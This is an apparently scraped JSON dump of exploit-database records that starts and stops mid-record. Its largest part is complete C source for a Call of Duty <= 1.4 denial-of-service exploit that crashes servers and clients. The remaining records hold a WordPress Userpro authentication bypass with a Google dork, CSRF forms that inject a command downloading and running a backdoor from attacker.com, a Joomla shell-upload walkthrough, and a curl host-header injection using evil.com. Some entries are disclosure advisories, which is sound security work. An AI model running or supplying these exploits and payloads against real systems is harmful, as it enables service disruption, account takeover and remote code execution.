if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "50149f6fc55c0ce9a36b21450f566a6d", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a997313577ce64f57e6c6891c2c95450", "key": "sourceHref"}, {"hash": "396ff4f9c9e83963eb0a6caff50a290f", "key": "sourceData"}, {"hash": "5a856d8508314549fc011ddb2462253e", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "published"}, {"hash": "888babac088d40ba4e1d76e7b342e511", "key": "title"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category dos / poc", "hash": "867712d10f803971bb0df2d890f991eda71242aa898886e93531952350ae1320", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-04-04T17:34:04"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-28960", "1337DAY-ID-19942"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12773", "SECURITYVULNS:DOC:28856", "SECURITYVULNS:VULN:5878", "SECURITYVULNS:DOC:10123", 
"SECURITYVULNS:VULN:3512"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118743"]}, {"type": "exploitdb", "idList": ["EDB-ID:38114"]}, {"type": "htbridge", "idList": ["HTB23127"]}], "modified": "2018-04-04T17:34:04"}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-04-04T17:34:04", "edition": 2, "title": "Call of Duty <= 1.4 Denial of Service Exploit", "href": "https://0day.today/exploit/description/5878", "modified": "2004-09-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/5878", "references": [], "reporter": "Luigi Auriemma", "sourceData": "=============================================\r\nCall of Duty <= 1.4 Denial of Service Exploit\r\n=============================================\r\n\r\n\r\n/* winerr.h */\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = 
\"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = 
\"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* codboom.c */\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <io.h>\r\n #include <malloc.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define PORT 28960\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getinfo xxx\\n\"\r\n#define BOOM \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" 
\\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n // must be major than 1023 bytes\r\n#define SVBOF \"\\xff\\xff\\xff\\xff\" \"getinfo %s\\n\"\r\n#define CLBOF \"\\xff\\xff\\xff\\xff\" \\\r\n \"%sResponse\\n\" \\\r\n \"\\\\g_gametype\\\\dm\" \\\r\n \"\\\\gamename\\\\Call of Duty\" \\\r\n \"\\\\mapname\\\\mp_carentan\" \\\r\n \"\\\\protocol\\\\5\" \\\r\n \"\\\\scr_friendlyfire\\\\0\" \\\r\n \"\\\\scr_killcam\\\\0\" \\\r\n \"\\\\shortversion\\\\1.4\" \\\r\n \"\\\\sv_allowAnonymous\\\\0\" \\\r\n \"\\\\sv_floodProtect\\\\1\" \\\r\n \"\\\\sv_hostname\\\\Crash\" \\\r\n \"\\\\sv_maxclients\\\\26\" \\\r\n \"\\\\sv_maxPing\\\\0\" \\\r\n \"\\\\sv_maxRate\\\\10000\" \\\r\n \"\\\\sv_minPing\\\\0\" \\\r\n \"\\\\sv_privateClients\\\\0\" \\\r\n \"\\\\sv_punkbuster\\\\1\" \\\r\n \"\\\\sv_pure\\\\1\" \\\r\n \"\\\\pswrd\\\\0\" \\\r\n \"\\\\mod\\\\1\" \\\r\n \"\\\\crash\\\\%s\"\r\n\r\n\r\n\r\nvoid show_info(u_char *buff);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd,\r\n len,\r\n psz,\r\n on = 1,\r\n type;\r\n u_short port = PORT;\r\n u_char buff[BUFFSZ + 1];\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Call of Duty <= 1.4 server/client shutdown \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\nUsage: %s <attack> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" c = broadcast clients shutdown\\n\"\r\n \" s = server shutdown\\n\"\r\n \" You must add the IP or the hostname of the server after the 's'.\\n\"\r\n \"\\n\"\r\n \"Some usage examples:\\n\"\r\n \" codboom c listens on port %d for clients\\n\"\r\n \" codboom c 1234 listens on port 1234\\n\"\r\n \" codboom s 192.168.0.1 tests the server 
192.168.0.1 on port %d\\n\"\r\n \" codboom s codserver 1234 tests the server codserver on port 1234\\n\"\r\n \"\\n\", argv[0], PORT, PORT, PORT);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif \r\n\r\n type = argv[1][0];\r\n if(type == 's') {\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Error: you must specify the server IP or hostname.\\n\"\r\n \" Example: %s s localhost\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n if(argc > 3) port = atoi(argv[3]);\r\n printf(\"\\n- Target %s:%hu\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n port);\r\n\r\n } else if(type == 'c') {\r\n peer.sin_addr.s_addr = INADDR_ANY;\r\n if(argc > 2) port = atoi(argv[2]);\r\n printf(\"\\n- Listen on port %d\\n\", port);\r\n\r\n } else {\r\n fputs(\"\\n\"\r\n \"Error: Wrong type of chosen attack.\\n\"\r\n \" You can choose between 2 types of attacks, passive versus clients with\\n\"\r\n \" 'c' or versus servers with 's'\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n psz = sizeof(peer);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(type == 's') {\r\n fputs(\"- Request informations\\n\", stdout);\r\n if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\n\"\r\n \"Error: socket timeout, probably the server is not online or the port is wrong\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n show_info(buff);\r\n\r\n fputs(\"- Send BOOM packet\\n\", stdout);\r\n len = sprintf(buff, SVBOF, BOOM);\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n len = 
recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n printf(\"\\n\"\r\n \"Server doesn't seem to be vulnerable, the following is the answer received:\\n\"\r\n \"\\n%s\\n\\n\", buff);\r\n }\r\n } else {\r\n if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n fputs(\" Clients:\\n\", stdout);\r\n for(;;) {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n\r\n printf(\"%16s:%hu -> %s\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n ntohs(peer.sin_port),\r\n buff);\r\n\r\n if(!memcmp(buff + 4, \"getinfo\", 7)) {\r\n len = sprintf(buff, CLBOF, \"info\", BOOM);\r\n } else {\r\n len = sprintf(buff, CLBOF, \"status\", BOOM);\r\n }\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n }\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nvoid show_info(u_char *buff) {\r\n int nt = 1;\r\n u_char *string;\r\n\r\n while((string = strchr(buff, '\\\\'))) {\r\n *string = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", buff);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", buff);\r\n nt = 0;\r\n }\r\n buff = string + 1;\r\n }\r\n printf(\"%s\\n\", buff);\r\n}\r\n\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long 
*)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "e2900be7b904b6cb4baea1c38c00cf86", "key": "href"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "modified"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5a856d8508314549fc011ddb2462253e", "key": "reporter"}, {"hash": "686b25390267b5dd8a71adcda093ff2b", "key": "sourceData"}, {"hash": "c5b84d6d56faead77cf51aaefa7e01a8", "key": "sourceHref"}, {"hash": "888babac088d40ba4e1d76e7b342e511", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-02-18T21:28:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-11-06T00:00:00", "published": "2017-11-06T00:00:00", "href": "https://0day.today/exploit/description/28960", "id": "1337DAY-ID-28960", "type": "zdt", "title": "WordPress Userpro Plugin < 4.9.17.1 - Authentication Bypass Vulnerability", "sourceData": "# Exploit Title: Userpro \u2013 WordPress Plugin \u2013 Authentication Bypass\r\n# Google Dork: inurl:/plugins/userpro\r\n# Date: 11.04.2017\r\n# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)\r\n# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9\r\n# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9\r\n# Version: <= 4.6.17\r\n# Tested on: Wordpress 4.8.3\r\n# CVE : requested, not assigned yet.\r\n \r\nDescription\r\n================================================================================\r\n The userpro plugin has the ability to bypass login authentication for the user\r\n 'admin'. If the site does not use the standard username 'admin' it is not affected.\r\n \r\nPoC\r\n================================================================================\r\n1 - Google Dork inurl:/plugins/userpro\r\n \r\n2 - Browse to a site that has the userpro plugin installed.\r\n \r\n3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true\r\n \r\n4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. 
You are now logged in\r\nwill full administrator access.\r\n================================================================================\r\n \r\n10/25/2017 \u2013 Wordfence notified of issue by Iain Hadgraft.\r\n10/26/2017 \u2013 Vendor resolved the issue in the plugin.\r\n11/04/2017 - Disclosure.\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/28960", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-11T05:17:36", "bulletinFamily": "exploit", "description": "Smartphone Pentest Framework (SPF) versions 0.1.3 and 0.1.4 suffer from an OS command injection vulnerability.", "modified": "2012-12-12T00:00:00", "published": "2012-12-12T00:00:00", "id": "1337DAY-ID-19942", "href": "https://0day.today/exploit/description/19942", "type": "zdt", "title": "Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection", "sourceData": "Product: Smartphone Pentest Framework (SPF)\r\nVendor: Bulb Security LLC\r\nVulnerable Versions: 0.1.3, 0.1.4 and probably prior\r\nTested Versions: 0.1.3, 0.1.4\r\nVendor Notification: November 19, 2012 \r\nPublic Disclosure: December 10, 2012 \r\nVulnerability Type: OS Command Injection [CWE-78]\r\nCVE Reference: CVE-2012-5878\r\nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \r\n\r\nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. 
\r\n\r\nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/\r\n\r\nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples.\r\n\r\n\r\n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878\r\n\r\nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \r\n\r\n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \r\n\r\nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. 
\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"platformDD2\" value='android' />\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.4 The vulnerability exists in \"guessPassword.pl\" script due to insufficient validation of user-supplied input passed via the \"ipAddressTB\" parameter. 
The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/guessPassword.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable.\r\n\r\nAs a temporary solution remove or disable SPF's GUI.\r\n\r\n-----------------------------------------------------------------------------------------------\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19942"}, {"lastseen": "2018-04-14T08:05:10", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-06-18T00:00:00", "published": "2010-06-18T00:00:00", "id": "1337DAY-ID-12773", "href": "https://0day.today/exploit/description/12773", "type": "zdt", "title": "Joomla Component com_joomlisting Upload Vulnerability", "sourceData": "=====================================================\r\nJoomla Component com_joomlisting Upload Vulnerability\r\n=====================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ 
\\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\nName : Joomla com_joomlisting Upload Vulnerability\r\nDate : june, 18 2010\r\nVendor url :http://www.joomclan.com/demo/joomlistings/index.php\r\nCritical Level : MEDIUM\r\nAuthor : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>\r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_\r\ngreetz to :All ICW members and my friends luv y0 guyz\r\n#######################################################################################################\r\nDescription:\r\nStart your very own Classified Ads website today or add classifieds functionality to your existing website using JoomListings. This component\r\n\r\nintegrates with your Joomla portal and has all the tools you need to create a successful, and income-earning website. We provide you with an\r\n\r\nintuitive admin control panel from Joomla Administrator to add, modify settings and pricing packages on your site. The component can be set\r\n\r\nup to run itself through automatic email notifications, automated billing, and other valuable time-saving features.\r\n\r\nJC - JoomListings is a professionally developed classifieds component that was built with you - the site owner - in mind and to assist you in\r\n\r\ngenerating income from your website. Whether you are running classifieds for autos, motorcycles, bicycles, real estate, jobs, or general\r\n\r\nmerchandise, JoomListings component with Joomla! 
is the right package for you.\r\n\r\n#######################################################################################################\r\ncom_joomdocs suffers from Upload Vulnerability\r\n\r\nXploit:Upload Vulnerability\r\n\r\nStep 1 : As always register as a user :P\r\n\r\nStep 2 : Select \"post ad\" option.\r\n DEMO URL :http://www.joomclan.com/demo/joomlistings/index.php?option=com_joomlistings&view=ad&layout=post&Itemid=61\r\n\r\nStep 3 : Upload your shell in upload image option as well as your description area\r\n\r\nStep 4 : Now browse your and you can own the box\r\n\r\n###############################################################################################################\r\n# 0day no more\r\n# Sid3^effects \r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12773"}], "wpvulndb": [{"lastseen": "2019-07-15T13:40:29", "bulletinFamily": "software", "description": "WordPress Vulnerability - WordPress 2.3-4.8.3 - Host Header Injection in Password Reset curl -H \"Host: www.evil.com\" --data \"user_login=admin&redirect;_to=&wp-submit;=Get+New+Password\" http://example.com/wp-login.php?action=lostpassword \n", "modified": "2018-08-29T00:00:00", "published": "2017-05-05T00:00:00", "id": "WPVDB-ID:8807", "href": "https://wpvulndb.com/vulnerabilities/8807", "type": "wpvulndb", "title": "WordPress 2.3-4.8.3 - Host Header Injection in Password Reset", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-07-17T14:26:51", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806154", "title": "Apple Mac OS X Multiple Vulnerabilities-02 October-15", "type": "openvas", "sourceData": 
